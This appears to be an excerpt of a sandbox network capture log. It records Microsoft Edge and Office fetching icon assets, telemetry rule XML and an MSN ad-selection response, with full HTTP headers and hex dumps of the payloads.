                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC431OUTGET /assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Length: 1966
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Last-Modified: Fri, 03 Nov 2023 21:43:31 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBDCB5EC122A94
                                                                                                                                                                                                                                                      x-ms-request-id: 2988f1e2-101e-005a-3c70-436e86000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968cpnpfhC1EWR3afc00000011q0000000004718
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1966INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 43 49 44 41 54 78 01 ed 97 5b 68 5c 75 1e c7 7f ff 73 f9 9f 49 d2 49 4f da 98 b4 6a d7 d9 c5 16 bc b0 4e c1 bd c8 6e d8 99 07 1f 74 1f 9a e0 2a 15 77 d7 06 0b 82 0f d5 3c 54 10 1f 3a 41 d0 2a 8a 2d 55 29 68 4d 14 1f 6a d3 92 3c 28 58 45 92 fa d0 0a 82 8e 48 14 6a 6b 53 d0 b4 21 4d e7 cc 64 6e 67 ce cd ef ef 64 4e 48 ed c5 74 d2 e8 4b 7f c3 9f ff b9 cd 39 9f f3 fd ff 6e 87 e8 ba 2d cd c4 62 2f 1c 1a 1a 4a 29 8a b2 c9 f3 bc 44 10 04 3c c8 71 1c 0b fb 59 8c af 71 6e a4 b7 b7 d7 a2 6b 6c bf 0a 38 3c 3c fc
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaCIDATx[h\usIIOjNnt*w<T:A*-U)hMj<(XEHjkS!MdngdNHtK9n-b/J)D<qYqnkl8<<


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      138192.168.2.104991213.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC433OUTGET /assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Length: 1751
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Last-Modified: Tue, 17 Oct 2023 00:34:33 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBCEA8D5AACC85
                                                                                                                                                                                                                                                      x-ms-request-id: d373f6e7-901e-0004-0d70-439d85000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f78459684bddphC1EWRbht400000011s0000000008awv
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1751INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 06 6c 49 44 41 54 78 01 ed 98 4d 6c 54 55 14 c7 cf 9d ce b4 52 09 42 85 b8 40 ed f3 23 44 37 0a b8 32 71 01 71 a1 89 1b dc 08 3b ab 0b 64 87 b8 30 84 10 3a c3 c2 a5 1a 57 b8 52 16 26 6e 8c 10 3f 91 c5 a0 a2 21 0d d1 c6 18 63 34 9a 91 b8 c0 40 6c a1 ed cc 7b ef 7e 1c ff e7 de fb e6 4d 3f a0 1f d4 e8 a2 17 5e de eb ed 9b f7 7e f7 7f ce f9 9f 3b 25 5a 1b 6b e3 bf 1d 8a 56 71 d4 cf f2 2e 36 34 ca 44 bb d8 11 15 07 71 cf 19 ff 71 ad 08 3f 3b 4b 13 4e bb 3f 74 27 1f cf 3a d4 38 71 68 5d eb 5f 03 3c 76 86 9f c7
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAalIDATxMlTURB@#D72qq;d0:WR&n?!c4@l{~M?^~;%ZkVq.64Dqq?;KN?t':8qh]_<v


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      139192.168.2.104991413.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC433OUTGET /assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Length: 1427
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Last-Modified: Fri, 03 Nov 2023 21:43:36 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBDCB5EF021F8E
                                                                                                                                                                                                                                                      x-ms-request-id: 7dd5c0ae-201e-001d-7970-43b1ed000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968n2hr8hC1EWR9cag00000011pg000000006txp
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1427INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 05 28 49 44 41 54 78 01 ed 57 cd 6b 24 45 14 7f af 67 86 c4 5d cd 8e 9b 05 d1 3d ec e8 1f 20 5e 3d 28 eb 41 04 41 44 10 3c 66 d1 53 92 d3 42 40 72 da 11 84 5c b3 7f 80 24 39 48 40 d4 8b 17 2f b2 e2 1f a0 1e 25 a7 01 11 16 17 35 1f f3 d1 dd d5 55 cf 57 df d5 d3 eb 4e 5a f0 22 53 a1 52 9d 57 5d ef fd de ef 7d 74 05 60 39 96 63 39 96 e3 3f 1d 08 ff 62 1c 1f 1f df e6 e5 9e 52 ea 15 5e fb bc 02 11 99 a9 9f f5 e4 41 52 4a 74 7b df f3 7a 77 7b 7b fb 67 68 39 5a 03 3c 3a 3a da 40 c4 43 0f ea 1f 56 3d 34 38 e2 89
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAa(IDATxWk$Eg]= ^=(AAD<fSB@r\$9H@/%5UWNZ"SRW]}t`9c9?bR^ARJt{zw{{gh9Z<::@CV=48


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      140192.168.2.104991513.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC430OUTGET /assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC523INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Length: 2008
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Last-Modified: Tue, 10 Oct 2023 17:24:26 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBC9B5C0C17219
                                                                                                                                                                                                                                                      x-ms-request-id: a40459ce-201e-003f-6e70-43dfdb000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968nxc96hC1EWRspw800000011v0000000001tbu
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 69316365
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC2008INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 07 6d 49 44 41 54 78 01 ed 98 bf 6f 14 47 14 c7 df ec 9d 11 48 48 5c aa 94 de 74 74 18 45 a9 59 24 0a d2 24 54 91 a0 f1 39 44 24 45 24 ec 32 0d be 28 05 44 14 98 2a e9 7c 96 50 e4 26 32 11 2d 02 47 91 02 4d 64 a3 08 25 92 a5 70 fc 05 18 ff 38 df ed af 97 ef 77 76 66 bd 36 07 67 9b 58 69 18 69 34 b3 b3 bb b3 9f fb ce 7b 6f de 9c c8 bb f2 76 c5 c8 21 95 bf 66 35 4c 33 59 8a 33 6d e0 33 53 1f 7e 69 66 38 fe 74 56 c7 b2 54 1e 26 a9 34 f2 4c a6 3e fa ba 18 ff e3 96 36 7b 89 cc 6e f5 45 92 2c 9b f8 b8 55 6f 73
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAamIDATxoGHH\ttEY$$T9D$E$2(D*|P&2-GMd%p8wvf6gXii4{ov!f5L3Y3m3S~if8tVT&4L>6{nE,Uos


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      141192.168.2.104991313.107.246.404432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC422OUTGET /assets/edge_hub_apps_M365_light.png/1.7.32/asset HTTP/1.1
                                                                                                                                                                                                                                                      Host: edgeassetservice.azureedge.net
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      Sec-Fetch-Site: none
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC516INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: image/png
                                                                                                                                                                                                                                                      Content-Length: 2229
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Last-Modified: Wed, 25 Oct 2023 19:48:24 GMT
                                                                                                                                                                                                                                                      ETag: 0x8DBD59359A9E77B
                                                                                                                                                                                                                                                      x-ms-request-id: 613c0126-301e-006f-4270-43c0d3000000
                                                                                                                                                                                                                                                      x-ms-version: 2009-09-19
                                                                                                                                                                                                                                                      x-ms-lease-status: unlocked
                                                                                                                                                                                                                                                      x-ms-blob-type: BlockBlob
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968pf68xhC1EWRr4h800000012b0000000001uh5
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_MISS
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC2229INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 28 00 00 00 28 08 06 00 00 00 8c fe b8 6d 00 00 00 09 70 48 59 73 00 00 16 25 00 00 16 25 01 49 52 24 f0 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 00 04 67 41 4d 41 00 00 b1 8f 0b fc 61 05 00 00 08 4a 49 44 41 54 78 01 ed 98 6d 88 5c 57 19 c7 9f e7 dc 7b 37 89 49 9a dd 6c 5e d6 96 c0 c4 36 a1 d5 2f 49 a1 92 22 ea 06 ac a4 41 21 05 41 2a e8 ee 16 a4 82 e0 26 62 a5 b5 92 99 f1 8b 2f 68 b3 fd 92 16 ad 64 fb 29 16 62 53 6d 68 17 15 b2 a2 ed 07 b1 6c a8 95 d6 97 74 36 a9 35 69 d2 90 dd 6d bb 9b 99 7b ce 79 fc 3f e7 dc d9 8d 99 24 b3 2f f9 d8 03 77 9e 7b ce dc b9 e7 77 ff cf cb 39 77 88 3e 6c 4b 6b 4c 37 a8 f5 ee 1d 2b a5 44 25 c2 47 9a d2 f8 c8 8f b6 8f d3 0d 68 4b 06 dc f1 8d df f7 ae cc ba cb 6c a8
                                                                                                                                                                                                                                                      Data Ascii: PNGIHDR((mpHYs%%IR$sRGBgAMAaJIDATxm\W{7Il^6/I"A!A*&b/hd)bSmhlt65im{y?$/w{w9w>lKkL7+D%GhKl


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      142192.168.2.104991713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC192OUTGET /rules/rule700051v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1389
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:46 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BE10A6BC1"
                                                                                                                                                                                                                                                      x-ms-request-id: 26f9b3b7-001e-008d-64ab-42d91e000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968ljs8phC1EWRe6en00000011w00000000076sz
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC1389INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 30 30 35 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 55 58 2e 43 72 69 74 69 63 61 6c 22 20 53 50 3d 22 43 72 69 74 69 63 61 6c 42 75 73 69 6e 65 73 73 49 6d 70 61 63 74 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 55 58 22 20 53 3d 22
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="700051" V="1" DC="SM" EN="Office.Telemetry.Event.Office.UX.Critical" SP="CriticalBusinessImpact" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenUX" S="


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      143192.168.2.104991613.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:51 UTC192OUTGET /rules/rule701250v1s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC494INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 1358
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Vary: Accept-Encoding
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:27:44 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BE022ECC5"
                                                                                                                                                                                                                                                      x-ms-request-id: 12481441-f01e-001f-6fb2-425dc8000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213851Z-174f7845968qj8jrhC1EWRh41s00000011zg000000005qy7
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC1358INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 37 30 31 32 35 30 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 54 65 6c 65 6d 65 74 72 79 2e 45 76 65 6e 74 2e 4f 66 66 69 63 65 2e 56 69 73 69 6f 22 20 44 4c 3d 22 41 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 52 49 53 3e 0d 0a 20 20 20 20 3c 52 49 20 4e 3d 22 45 76 65 6e 74 22 20 2f 3e 0d 0a 20 20 3c 2f 52 49 53 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 43 53 53 20 54 3d 22 31 22 20 43 3d 22 4e 65 78 75 73 54 65 6e 61 6e 74 54 6f 6b 65 6e 56 69 73 69 6f 22 20 53 3d 22 4d 65 64 69 75 6d 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="701250" V="1" DC="SM" EN="Office.Telemetry.Event.Office.Visio" DL="A" xmlns=""> <RIS> <RI N="Event" /> </RIS> <S> <UCSS T="1" C="NexusTenantTokenVisio" S="Medium" /> <F T="2">


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      144192.168.2.104991923.96.180.1894432116C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC1067OUTGET /v4/api/selection?nct=1&fmt=json&nocookie=0&locale=en-us&country=US&muid=2A00BA3058306B91366DAF7759986AB6&ACHANNEL=4&ABUILD=117.0.5938.132&clr=esdk&edgeid=8810299700620392370&ADEFAB=1&devosver=10.0.19045.2006&OPSYS=WIN10&poptin=0&UITHEME=light&pageConfig=547&ISSIGNEDIN=0&MSN_CANVAS=2&ISMOBILE=0&BROWSER=6&placement=88000308|10837393&bcnt=1|1&asid=2bb5e59f50de43f7beef8428609df6ac HTTP/1.1
                                                                                                                                                                                                                                                      Host: arc.msn.com
                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                      sec-ch-ua: "Microsoft Edge";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                      sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                      sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                      Accept: */*
                                                                                                                                                                                                                                                      Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                      Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                      Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                      Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                      Referer: https://ntp.msn.com/
                                                                                                                                                                                                                                                      Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                      Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                      Cookie: _C_ETH=1; USRLOC=; MUID=2A00BA3058306B91366DAF7759986AB6; _EDGE_S=F=1&SID=3DD5691DFF4E6D4327747C5AFE686C97; _EDGE_V=1
                                                                                                                                                                                                                                                      2024-11-30 21:38:52 UTC674INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                      Pragma: no-cache
                                                                                                                                                                                                                                                      Content-Length: 297
                                                                                                                                                                                                                                                      Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                                                                      Expires: Mon, 01 Jan 0001 00:00:00 GMT
                                                                                                                                                                                                                                                      Server: Microsoft-IIS/10.0
                                                                                                                                                                                                                                                      ARC-RSP-DBG: [{"DcoPlusDebug":"Status: Ok"},{"RADIDS":"2,,"},{"OPTOUTSTATE":"256"},{"REGIONALPOLICY":"0"}]
                                                                                                                                                                                                                                                      Accept-CH: UA, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform, UA-Platform-Version
                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                      X-AspNet-Version: 4.0.30319
                                                                                                                                                                                                                                                      X-Powered-By: ASP.NET
                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:51 GMT
                                                                                                                                                                                                                                                      Connection: close
